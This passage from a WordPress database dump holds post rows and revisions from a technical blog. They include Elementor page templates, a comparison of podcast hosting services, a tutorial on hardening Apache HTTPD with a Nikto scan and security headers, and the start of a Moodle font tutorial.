(723,2,'2023-05-02 13:46:50','2023-05-02 13:46:50','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2023-05-02 13:46:50','2023-05-02 13:46:50','',630,'https://ictbank.ir/blog/?p=723',0,'revision','',0),
(724,2,'2023-05-02 13:46:50','2023-05-02 13:46:50','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2023-05-02 13:46:50','2023-05-02 13:46:50','',630,'https://ictbank.ir/blog/?p=724',0,'revision','',0),
(725,2,'2023-05-02 13:46:50','2023-05-02 13:46:50','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2023-05-02 13:46:50','2023-05-02 13:46:50','',630,'https://ictbank.ir/blog/?p=725',0,'revision','',0),
(726,2,'2023-05-02 13:49:48','2023-05-02 13:49:48','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2023-05-02 13:49:48','2023-05-02 13:49:48','',630,'https://ictbank.ir/blog/?p=726',0,'revision','',0),
(727,2,'2023-05-02 13:49:48','2023-05-02 13:49:48','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2023-05-02 13:49:48','2023-05-02 13:49:48','',630,'https://ictbank.ir/blog/?p=727',0,'revision','',0),
(728,2,'2023-05-02 13:49:48','2023-05-02 13:49:48','<style>/*! elementor - v3.12.2 - 23-04-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Database Related posts</h2>','Database related posts','','inherit','closed','closed','','630-revision-v1','','','2023-05-02 13:49:48','2023-05-02 13:49:48','',630,'https://ictbank.ir/blog/?p=728',0,'revision','',0),
(729,2,'2023-05-02 14:15:35','2023-05-02 14:15:35','podcast','podcast','podcast','inherit','open','closed','','podcast','','','2023-05-02 14:17:40','2023-05-02 14:17:40','',329,'http://ictbank.ir/blog/wp-content/uploads/2021/02/podcast.webp',0,'attachment','image/webp',0),
(730,2,'2023-05-02 14:17:57','2023-05-02 14:17:57','<!-- wp:paragraph -->\n<p>To start a new podcast, you have to generate a feed in XML format.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This feed should contain metadata about the podcast and its episodes including a tag that point to link of uploaded audio file of episode.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So, at least, you should have these items:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>An storage to upload audio files of episodes which is accessible via internet</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>RSS feed to registered on google and apple podcast that can be accessed through internet</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To upload audio files you can choose one of the following:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>platforms that offer CDN services</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>VPS or web host</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>To generate RSS feed you can choose on of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li>manual</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>podcast modules like \"seriously simple podcast\" in wordpress</li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>Despite these approaches, you can simply choose platforms that offer podcast services. In these platforms, you can upload your files and they generate your feed automatically and keep it updated. some of them are free and some of them demands monthly fee for their services.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this part of this post, I want to introduce some of these platforms:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list {\"ordered\":true} -->\n<ol><!-- wp:list-item -->\n<li><strong>Buzzsprout (<a href=\"https://www.buzzsprout.com\">https://www.buzzsprout.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: 2 hours of content - hosted for 90 days</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$12-24 per month: unlimited storage - 250GB of bandwidth per month (enough for 20,000 to 40,000 downloads)</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Spreaker (<a href=\"https://www.spreaker.com/\">https://www.spreaker.com</a></strong>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$18 per month: 500 hours of audio storage</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>Transistor (<strong><strong><strong><a href=\"https://transistor.fm\">https://transistor.fm</a></strong></strong></strong>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>$19 per month (Starter Plan): Provides unlimited podcasts and episodes, up to 2 users, and 10,000 downloads per month.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li><strong>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)</strong><!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free plan: you can upload up to 5 hours of content per month, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$29 per month: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>Anchor (<a href=\"https://anchor.fm\">https://anchor.fm</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>free: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>PodBean (<a href=\"https://www.podbean.com\">https://www.podbean.com</a>)<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>you can upload up to 5 hours of content, but are only allowed 100GB of bandwidth</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>$14-$129: unlimited</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></li>\n<!-- /wp:list-item --></ol>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Hosting a Podcast','','inherit','closed','closed','','329-revision-v1','','','2023-05-02 14:17:57','2023-05-02 14:17:57','',329,'https://ictbank.ir/blog/?p=730',0,'revision','',0),
(731,2,'2023-05-02 14:19:11','2023-05-02 14:19:11','fedora','fedora','fedora','inherit','open','closed','','fedora','','','2023-05-02 14:19:21','2023-05-02 14:19:21','',312,'http://ictbank.ir/blog/wp-content/uploads/2020/11/fedora.png',0,'attachment','image/png',0),
(732,2,'2023-05-02 14:20:56','2023-05-02 14:20:56','apache_httpd','apache_httpd','apache_httpd','inherit','open','closed','','apache_httpd','','','2023-05-02 14:21:03','2023-05-02 14:21:03','',305,'http://ictbank.ir/blog/wp-content/uploads/2020/03/apache_httpd.png',0,'attachment','image/png',0),
(733,2,'2023-05-02 14:21:05','2023-05-02 14:21:05','<!-- wp:paragraph -->\n<p>There are some known security issues that can make an Apache Web Server insecure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If using Apache as a web service is your approach, then you should scan your web server in first step.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are many tools to scan a web server. here we will use <strong>NIKTO</strong>. Nikto is a free tool which is installed on Kali linux by default.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You can scan your server by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">nikto -h ictbank.ir</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>This command may suggests some issues that you have to handle.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here we will see some of them and try to fix them:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.<strong>The anti-clickjacking X-Frame-Options header is not present.</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This vulnerability means that this website could be at risk of a clickjacking attack. (read more: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-x-frame-options-header/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache from this threat, you have to edit Apache config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header always append X-Frame-Options SAMEORIGIN</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>You can replace SAMEORIGIN option with one of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>DENY: It completely denies to be loaded in frame/iframe.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>SAMEORIGIN: It allows only if the site which wants to load has a same origin.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>ALLOW-FROM URL: It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>2.<strong>The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the message indicate, this vulnerability can lead to XSS attacks. (read more: https://www.keycdn.com/blog/x-xss-protection)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache from this threat, you have to edit Apache config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">header always set X-XSS-Protection \"1; mode=block\"</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3.<strong>The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>with this vulnerability there is a possibility to execute style sheet and steal content from another site through content type doesn’t match (read more: https://geekflare.com/secure-mime-types-in-apache-nginx-with-x-content-type-options/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache from this threat, you have to edit Apache config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header set X-Content-Type-Options nosniff</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Don\'t forget to restart Apache service after these changes. Good Luck!</p>\n<!-- /wp:paragraph -->','How to make Apache Web Server more secure','','inherit','closed','closed','','305-revision-v1','','','2023-05-02 14:21:05','2023-05-02 14:21:05','',305,'https://ictbank.ir/blog/?p=733',0,'revision','',0),
(734,2,'2023-05-02 15:13:25','2023-05-02 15:13:25','<!-- wp:paragraph -->\n<p>There are some known security issues that can make an Apache HTTPD Web Server insecure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If using Apache HTTPD as a web service is your approach, then you should scan your web server in first step.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are many tools to scan a web server. here we will use <strong>NIKTO</strong>. Nikto is a free tool which is installed on Kali linux by default.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You can scan your server by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">nikto -h ictbank.ir</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>This command may suggests some issues that you have to handle.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here we will see some of them and try to fix them:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.<strong>The anti-clickjacking X-Frame-Options header is not present.</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This vulnerability means that this website could be at risk of a clickjacking attack. (read more: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-x-frame-options-header/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache HTTPD from this threat, you have to edit Apache HTTPD config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header always append X-Frame-Options SAMEORIGIN</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>You can replace SAMEORIGIN option with one of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>DENY: It completely denies to be loaded in frame/iframe.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>SAMEORIGIN: It allows only if the site which wants to load has a same origin.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>ALLOW-FROM URL: It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>2.<strong>The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the message indicate, this vulnerability can lead to XSS attacks. (read more: https://www.keycdn.com/blog/x-xss-protection)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache HTTPD from this threat, you have to edit Apache HTTPD config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">header always set X-XSS-Protection \"1; mode=block\"</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3.<strong>The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>with this vulnerability there is a possibility to execute style sheet and steal content from another site through content type doesn’t match (read more: https://geekflare.com/secure-mime-types-in-apache-nginx-with-x-content-type-options/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache HTTPD from this threat, you have to edit Apache HTTPD config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header set X-Content-Type-Options nosniff</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Don\'t forget to restart Apache HTTPD service after these changes. Good Luck!</p>\n<!-- /wp:paragraph -->','How to make Apache HTTPD Web Server more secure','','inherit','closed','closed','','305-revision-v1','','','2023-05-02 15:13:25','2023-05-02 15:13:25','',305,'https://ictbank.ir/blog/?p=734',0,'revision','',0),
(736,2,'2023-05-02 17:00:02','2023-05-02 17:00:02','<!-- wp:paragraph -->\n<p>There are some known security issues that can make an Apache HTTPD Web Server insecure.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>If using Apache HTTPD as a web service is your approach, then you should scan your web server in first step.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>There are many tools to scan a web server. here we will use <strong>NIKTO</strong>. Nikto is a free tool which is installed on Kali linux by default.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You can scan your server by this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">nikto -h ictbank.ir</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>This command may suggests some issues that you have to handle.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Here we will see some of them and try to fix them:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>1.<strong>The anti-clickjacking X-Frame-Options header is not present.</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This vulnerability means that this website could be at risk of a clickjacking attack. (read more: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-x-frame-options-header/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache HTTPD from this threat, you have to edit Apache HTTPD config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header always append X-Frame-Options SAMEORIGIN</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>You can replace SAMEORIGIN option with one of these:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><!-- wp:list-item -->\n<li>DENY: It completely denies to be loaded in frame/iframe.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>SAMEORIGIN: It allows only if the site which wants to load has a same origin.</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>ALLOW-FROM URL: It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p>2.<strong>The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the message indicate, this vulnerability can lead to XSS attacks. (read more: https://www.keycdn.com/blog/x-xss-protection)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache HTTPD from this threat, you have to edit Apache HTTPD config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">header always set X-XSS-Protection \"1; mode=block\"</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>3.<strong>The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>with this vulnerability there is a possibility to execute style sheet and steal content from another site through content type doesn’t match (read more: https://geekflare.com/secure-mime-types-in-apache-nginx-with-x-content-type-options/)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To secure Apache HTTPD from this threat, you have to edit Apache HTTPD config file (/etc/httpd/conf/httpd.conf) and add the follow line:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">Header set X-Content-Type-Options nosniff</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Don\'t forget to restart Apache HTTPD service after these changes. Good Luck!</p>\n<!-- /wp:paragraph -->','How to make Apache HTTPD Web Server more secure','','inherit','closed','closed','','305-revision-v1','','','2023-05-02 17:00:02','2023-05-02 17:00:02','',305,'https://ictbank.ir/blog/?p=736',0,'revision','',0),
(738,2,'2023-05-10 18:14:25','2023-05-10 18:14:25','','posts_all_template','','inherit','closed','closed','','712-revision-v1','','','2023-05-10 18:14:25','2023-05-10 18:14:25','',712,'https://ictbank.ir/blog/?p=738',0,'revision','',0),
(739,2,'2023-05-10 18:15:00','2023-05-10 18:15:00','','posts_all_template','','inherit','closed','closed','','712-revision-v1','','','2023-05-10 18:15:00','2023-05-10 18:15:00','',712,'https://ictbank.ir/blog/?p=739',0,'revision','',0),
(740,2,'2023-05-10 18:15:23','2023-05-10 18:15:23','','posts_databases_template','','inherit','closed','closed','','712-revision-v1','','','2023-05-10 18:15:23','2023-05-10 18:15:23','',712,'https://ictbank.ir/blog/?p=740',0,'revision','',0),
(741,2,'2023-05-10 18:20:21','2023-05-10 18:20:21','<style>/*! elementor - v3.13.1 - 09-05-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>OS Related posts</h2>','posts_os','','publish','closed','closed','','posts_os','','','2023-05-10 18:21:13','2023-05-10 18:21:13','',0,'https://ictbank.ir/blog/?page_id=741',0,'page','',0),
(743,2,'2023-05-10 18:20:21','2023-05-10 18:20:21','<style>/*! elementor - v3.13.1 - 09-05-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>OS Related posts</h2>','posts_os','','inherit','closed','closed','','741-revision-v1','','','2023-05-10 18:20:21','2023-05-10 18:20:21','',741,'https://ictbank.ir/blog/?p=743',0,'revision','',0),
(744,2,'2023-05-10 18:21:13','2023-05-10 18:21:13','<style>/*! elementor - v3.13.1 - 09-05-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>OS Related posts</h2>','posts_os','','inherit','closed','closed','','741-revision-v1','','','2023-05-10 18:21:13','2023-05-10 18:21:13','',741,'https://ictbank.ir/blog/?p=744',0,'revision','',0),
(745,2,'2023-05-10 18:21:13','2023-05-10 18:21:13','<style>/*! elementor - v3.13.1 - 09-05-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>OS Related posts</h2>','posts_os','','inherit','closed','closed','','741-revision-v1','','','2023-05-10 18:21:13','2023-05-10 18:21:13','',741,'https://ictbank.ir/blog/?p=745',0,'revision','',0),
(746,2,'2023-05-10 18:21:13','2023-05-10 18:21:13','<style>/*! elementor - v3.13.1 - 09-05-2023 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>OS Related posts</h2>','posts_os','','inherit','closed','closed','','741-revision-v1','','','2023-05-10 18:21:13','2023-05-10 18:21:13','',741,'https://ictbank.ir/blog/?p=746',0,'revision','',0),
(752,2,'2023-07-01 09:42:10','2023-07-01 09:42:10','<!-- wp:paragraph -->\n<p>If you have an academy and using <a href=\"https://moodle.org/\" data-type=\"URL\" data-id=\"https://moodle.org/\">moodle</a> as an LMS is your choice, you may want to change default font of pages to a new one. In this article I am going to talk about a method to do so.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all you have to choose which theme you wanna use (through <strong>Administration > Appearance > Themes > Theme selector</strong>). For example I am gonna use <strong>boost</strong> theme.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Then, you have to copy your font\'s files into theme\'s directory.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">cp FONT_PATH/[font_file].* MOODLE_PATH/theme/[theme_name]</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>Then you have to open theme\'s config.php file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">vi MOODLE_PATH/theme/[theme_name]/config.php</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>and change the value of <strong>$THEME->sheets </strong>parameter:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">$THEME->sheets = [\'FontName\'];</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>After that you have to create a 